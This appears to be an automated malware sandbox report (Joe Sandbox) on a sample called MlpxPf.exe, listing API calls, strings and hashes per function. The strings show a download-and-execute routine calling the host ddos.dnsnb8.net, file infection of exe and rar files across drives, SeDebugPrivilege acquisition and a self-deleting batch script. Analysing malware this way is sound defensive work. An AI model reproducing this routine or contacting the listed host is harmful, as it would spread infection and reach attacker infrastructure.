FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0059201E
memset.MSVCRT ref: 005920D8
memset.MSVCRT ref: 005920EA
memcpy.MSVCRT ref: 0059222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00592238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0059224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922DD
WriteFile.KERNEL32(000000FF,00594008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0059230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00592322
UnmapViewOfFile.KERNEL32(?,?,005932B0,00000164,00592986,?), ref: 00592340
CloseHandle.KERNEL32(?,?,005932B0,00000164,00592986,?), ref: 0059234E
CloseHandle.KERNEL32(000000FF,?,005932B0,00000164,00592986,?), ref: 00592359

Strings

m@Y, xrefs: 00591E8F, 0059225A
<@Y, xrefs: 00592290
.@Y, xrefs: 00592274
5@Y, xrefs: 00592282
C@Y, xrefs: 0059229E

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@Y$5@Y$<@Y$C@Y$m@Y
API String ID: 3043204753-3427592209
Opcode ID: 353e7cba75776ac347e717a0d0ea02423ccdb48f5d2a5d99e6ef10809eec598f
Instruction ID: 1abf0ad4c91be4eb5edc38eadb162e14311d95817c2faac58528397921e8b948
Opcode Fuzzy Hash: 353e7cba75776ac347e717a0d0ea02423ccdb48f5d2a5d99e6ef10809eec598f
Instruction Fuzzy Hash: E2F18C7090061AEFCF20DFA8DC89AADBBB5FF18304F10452AE50AA7661D734AD91DF54

Function 0059274A Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00592766
memset.MSVCRT ref: 00592774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00592787
wsprintfA.USER32 ref: 005927AB

Part of subcall function 0059185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
Part of subcall function 0059185B: srand.MSVCRT ref: 00591878
Part of subcall function 0059185B: rand.MSVCRT ref: 00591880
Part of subcall function 0059185B: srand.MSVCRT ref: 00591890
Part of subcall function 0059185B: rand.MSVCRT ref: 00591894

wsprintfA.USER32 ref: 005927C6
CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\08660606.exe,00000000), ref: 005927D4
wsprintfA.USER32 ref: 005927F4

Part of subcall function 00591973: PathFileExistsA.KERNELBASE(\NY`NY,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591992
Part of subcall function 00591973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005919BA
Part of subcall function 00591973: Sleep.KERNEL32(00000064), ref: 005919C6
Part of subcall function 00591973: wsprintfA.USER32 ref: 005919EC
Part of subcall function 00591973: CopyFileA.KERNEL32(?,?,00000000), ref: 00591A00
Part of subcall function 00591973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00591A1E
Part of subcall function 00591973: GetFileSize.KERNEL32(?,00000000), ref: 00591A2C
Part of subcall function 00591973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00591A46
Part of subcall function 00591973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00591A65

DeleteFileA.KERNEL32(?,?,00594E54,00594E58), ref: 0059281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00594E54,00594E58), ref: 00592832

Strings

C:\Windows\system32, xrefs: 005927E3
%s\%s, xrefs: 005927EE
%s%s, xrefs: 005927A5
c_31892.nls, xrefs: 005927DE
C:\Users\user\AppData\Local\Temp\, xrefs: 005927B6
%s%.8x.exe, xrefs: 005927BB
\WinRAR\Rar.exe, xrefs: 00592793
C:\Users\user\AppData\Local\Temp\08660606.exe, xrefs: 005927C0, 005927C5, 005927CC

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\08660606.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-431344584
Opcode ID: dc0b3b8e23df65621326bf90b0ca613b7b7857828b22a5b789718e4df8440cb5
Instruction ID: c8fc072536396e22a54686e9a1d4382b5b940d4f3d96cd6b3fec90baa2bfa38e
Opcode Fuzzy Hash: dc0b3b8e23df65621326bf90b0ca613b7b7857828b22a5b789718e4df8440cb5
Instruction Fuzzy Hash: B32184B6D4021CBBDF10E7A49C8AFEB7B6CFB14744F0005A2B644E2051E670DF488EA0

Function 00591973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.KERNELBASE(\NY`NY,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591992
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005919BA
Sleep.KERNEL32(00000064), ref: 005919C6
wsprintfA.USER32 ref: 005919EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00591A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00591A1E
GetFileSize.KERNEL32(?,00000000), ref: 00591A2C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00591A46
ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00591A65
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00591A90
DeleteFileA.KERNEL32(?), ref: 00591AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00591AC1

Strings

\NY`NY, xrefs: 00591980
%s%.8X.data, xrefs: 005919E6
C:\Users\user\AppData\Local\Temp\, xrefs: 005919DB
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 0059197C

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$\NY`NY
API String ID: 2523042076-2589312797
Opcode ID: 0085aeb9575bdb8265e9bf528b8118cb8d15a035759d248f53b2e8cbe13b8623
Instruction ID: 9ca6f233662e0c780f0afc4cfbf9eda622e6b9e70392e13f1e6b5b0d5d6caf56
Opcode Fuzzy Hash: 0085aeb9575bdb8265e9bf528b8118cb8d15a035759d248f53b2e8cbe13b8623
Instruction Fuzzy Hash: 2F515E7190162AEFCF10DF98CD88AAEBFB9FB05354F10456AF515E6190D3309E44DB94

Function 005928B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 005928D3
wsprintfA.USER32 ref: 005928F7
memset.MSVCRT ref: 00592925
wsprintfA.USER32 ref: 00592940

Part of subcall function 005929E2: memset.MSVCRT ref: 00592A02
Part of subcall function 005929E2: wsprintfA.USER32 ref: 00592A1A
Part of subcall function 005929E2: memset.MSVCRT ref: 00592A44
Part of subcall function 005929E2: lstrlen.KERNEL32(?), ref: 00592A54
Part of subcall function 005929E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00592A6C
Part of subcall function 005929E2: strrchr.MSVCRT ref: 00592A7C
Part of subcall function 005929E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00592A9F
Part of subcall function 005929E2: lstrlen.KERNEL32(Documents and Settings), ref: 00592AAE
Part of subcall function 005929E2: memset.MSVCRT ref: 00592AC6
Part of subcall function 005929E2: memset.MSVCRT ref: 00592ADA
Part of subcall function 005929E2: FindFirstFileA.KERNELBASE(?,?), ref: 00592AEF
Part of subcall function 005929E2: memset.MSVCRT ref: 00592B13

strrchr.MSVCRT ref: 00592959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00592974

Strings

%s\, xrefs: 0059293A
%s%s, xrefs: 005928F1
rar, xrefs: 00592988
C:\Users\user\AppData\Local\Temp\, xrefs: 005929B3
exe, xrefs: 0059296D

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1035934456
Opcode ID: b1b601d850350e5f4e5f18fe75aa3dc1b34c9771721fa7e28f81e67a55b1a99c
Instruction ID: b2e5358e15b293a50ea470da3872ee947fb52cb201c41ddce36e59c764fe2cfc
Opcode Fuzzy Hash: b1b601d850350e5f4e5f18fe75aa3dc1b34c9771721fa7e28f81e67a55b1a99c
Instruction Fuzzy Hash: 7431847694031DBBDF20A764DC8AFDA7F6CBB24710F050853F545A6181E6B49EC49BA0

Function 00591099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0059185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
Part of subcall function 0059185B: srand.MSVCRT ref: 00591878
Part of subcall function 0059185B: rand.MSVCRT ref: 00591880
Part of subcall function 0059185B: srand.MSVCRT ref: 00591890
Part of subcall function 0059185B: rand.MSVCRT ref: 00591894

WinExec.KERNEL32(?,00000005), ref: 005910F1
lstrlen.KERNEL32(00594748), ref: 005910FA
wsprintfA.USER32 ref: 0059112A
wsprintfA.USER32 ref: 00591143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0059115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00591169
Sleep.KERNEL32 ref: 00591179

Strings

HGY, xrefs: 0059112C
cj/, xrefs: 00591135
C:\Users\user\AppData\Local\Temp\, xrefs: 00591119
http://%s:%d/%s/%s, xrefs: 005910C2, 00591141
ddos.dnsnb8.net, xrefs: 005910C8, 005910CF, 00591140, 00591168
%s%.8X.exe, xrefs: 00591124

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGY$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-4043388241
Opcode ID: 1962e309231677c652c9dfa736fc4fa77464fae7038edd3773208b8e8ccddc81
Instruction ID: 39acff978246a673b51eaaadf8446ee69415f373d849e8fbc827cc8a2be5f539
Opcode Fuzzy Hash: 1962e309231677c652c9dfa736fc4fa77464fae7038edd3773208b8e8ccddc81
Instruction Fuzzy Hash: A8217A75900219FBDF209BA0DC49EAFBFBDFB15315F124096E501A2050D7749E89EFA4

Function 00591581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0059185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
Part of subcall function 0059185B: srand.MSVCRT ref: 00591878
Part of subcall function 0059185B: rand.MSVCRT ref: 00591880
Part of subcall function 0059185B: srand.MSVCRT ref: 00591890
Part of subcall function 0059185B: rand.MSVCRT ref: 00591894

wsprintfA.USER32 ref: 005915AA
wsprintfA.USER32 ref: 005915C6
lstrlen.KERNEL32(?), ref: 005915D2
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 005915EE
WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00591609
CloseHandle.KERNEL32(00000000), ref: 00591612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0059162D

Strings

%s%.8x.bat, xrefs: 005915A4
C:\Users\user\AppData\Local\Temp\, xrefs: 00591599
open, xrefs: 00591627
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 0059158A, 005915B3, 005915B8, 005915B9
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 005915C0

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$open
API String ID: 617340118-3616273218
Opcode ID: 090cf4b16c50e779d286ac20ac758fbca9271638f351719d5bc49116bcb780ab
Instruction ID: 23bc0d3bb4ec20c8dc7d5990edc71b3e4bf9406e96e58e160032739df47f48eb
Opcode Fuzzy Hash: 090cf4b16c50e779d286ac20ac758fbca9271638f351719d5bc49116bcb780ab
Instruction Fuzzy Hash: 13112176A01128BADB2097A5DC8DDEB7E7CEF59751F010052F549E2050EA709F89DBB0

Function 00591638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0059164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0059165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00000104), ref: 0059166E
CreateThread.KERNELBASE(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 005916AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 005916BD

Part of subcall function 0059139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 005913BC
Part of subcall function 0059139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005913DA
Part of subcall function 0059139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00591448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 005916E5

Strings

C:\Windows\system32, xrefs: 00591656
Documents and Settings, xrefs: 00591696
C:\Users\user\AppData\Local\Temp\, xrefs: 00591644
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00591662, 00591667, 005916DD

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-474348920
Opcode ID: a9f44eb90496bbdf3dd6c0652dd04fe544d9e0365e9cbce5149c9617ddec7a75
Instruction ID: 85562dbeed94f0dadc56d4c61a22c19c87a70770c962c9941709655f764bcae9
Opcode Fuzzy Hash: a9f44eb90496bbdf3dd6c0652dd04fe544d9e0365e9cbce5149c9617ddec7a75
Instruction Fuzzy Hash: 56110471901236FBDF206BA4ED4EE9F3E6DFB61361F020012F20A911A0D6758D49EBB5

Function 00591000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGY,http://%s:%d/%s/%s,005910E8,?), ref: 00591018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76C08400), ref: 00591029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00591038
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 0059104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00591075
CloseHandle.KERNEL32(?), ref: 0059108B
CloseHandle.KERNEL32(00000000), ref: 0059108E

Strings

HGY, xrefs: 00591001
http://%s:%d/%s/%s, xrefs: 00591000
ddos.dnsnb8.net, xrefs: 00591026

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HGY$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-1359388518
Opcode ID: 6a87901f3ee1a0e98c3ca330ee037fa65d71c94a5c4b82d1d384034afb1bb5a1
Instruction ID: a298f6b3a1cd53c5f8e9a4a2a7804560187bac1edad6cc10b40b1df4f75a15f5
Opcode Fuzzy Hash: 6a87901f3ee1a0e98c3ca330ee037fa65d71c94a5c4b82d1d384034afb1bb5a1
Instruction Fuzzy Hash: 7201967110075DFFE7305F609C8DE2BBBACEB447D9F05452AF245A2090D6715E489B74

Function 00592B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00592BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00592BB4
GetDriveTypeA.KERNELBASE(?), ref: 00592BD3
CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00592BEE
lstrlen.KERNEL32(?), ref: 00592BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00592C16
CreateThread.KERNELBASE(00000000,00000000,00592845,00000000,00000000,00000000), ref: 00592C3A

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 982b0ad1677f660994394a2643f4321f4380578d8dae3847c1cbcfcbc69f1b8b
Instruction ID: 657f4037e47a8ef75c5c4dcfd87097a822f6a4d8a2a7ade6045e553883126e43
Opcode Fuzzy Hash: 982b0ad1677f660994394a2643f4321f4380578d8dae3847c1cbcfcbc69f1b8b
Instruction Fuzzy Hash: 3121C3B180014CBFEB20AF649C88EEE7FADFB15344F150126F85292151D7209D0ADF61

Function 00592C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00592C57

Part of subcall function 00591973: PathFileExistsA.KERNELBASE(\NY`NY,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591992
Part of subcall function 00591973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005919BA
Part of subcall function 00591973: Sleep.KERNEL32(00000064), ref: 005919C6
Part of subcall function 00591973: wsprintfA.USER32 ref: 005919EC
Part of subcall function 00591973: CopyFileA.KERNEL32(?,?,00000000), ref: 00591A00
Part of subcall function 00591973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00591A1E
Part of subcall function 00591973: GetFileSize.KERNEL32(?,00000000), ref: 00591A2C
Part of subcall function 00591973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00591A46
Part of subcall function 00591973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00591A65

CreateThread.KERNELBASE(00000000,00000000,00592B8C,00000000,00000000,00000000), ref: 00592C99
WaitForMultipleObjects.KERNEL32(00000001,005916BA,00000001,000000FF,?,005916BA,00000000), ref: 00592CAC
VirtualFree.KERNELBASE(01230000,00000000,00008000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00594E5C,00594E60,?,005916BA,00000000), ref: 00592CC2

Strings

C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00592C69

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
API String ID: 2042498389-2612645121
Opcode ID: 5a9f21994526af90c83d1f0078ab98c858c872ad06a9e17665c91a150844b463
Instruction ID: 9c1ff53bb20c4286c947473fd30e32e669e3bcb46e33305d512f5659f71c1bb2
Opcode Fuzzy Hash: 5a9f21994526af90c83d1f0078ab98c858c872ad06a9e17665c91a150844b463
Instruction Fuzzy Hash: 11018B71641224BADF10EBA5EC1EEAF7EACFF51B60F104121BA05D61C1E6A09E04CBE1

Function 00592845 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0059274A: memset.MSVCRT ref: 00592766
Part of subcall function 0059274A: memset.MSVCRT ref: 00592774
Part of subcall function 0059274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00592787
Part of subcall function 0059274A: wsprintfA.USER32 ref: 005927AB
Part of subcall function 0059274A: wsprintfA.USER32 ref: 005927C6
Part of subcall function 0059274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\08660606.exe,00000000), ref: 005927D4
Part of subcall function 0059274A: wsprintfA.USER32 ref: 005927F4
Part of subcall function 0059274A: DeleteFileA.KERNEL32(?,?,00594E54,00594E58), ref: 0059281A
Part of subcall function 0059274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00594E54,00594E58), ref: 00592832

DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\08660606.exe), ref: 0059287D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00592894
CloseHandle.KERNEL32(FFFFFFFF), ref: 005928A5

Part of subcall function 00592692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,005929DB,?,00000001), ref: 005926A7
Part of subcall function 00592692: WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,005929DB,?,00000001), ref: 005926B5
Part of subcall function 00592692: lstrlen.KERNEL32(?), ref: 005926C4
Part of subcall function 00592692: ??2@YAPAXI@Z.MSVCRT ref: 005926CE
Part of subcall function 00592692: lstrcpy.KERNEL32(00000004,?), ref: 005926E3
Part of subcall function 00592692: SetEvent.KERNEL32 ref: 0059273C

Strings

C:\Users\user\AppData\Local\Temp\08660606.exe, xrefs: 00592878

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

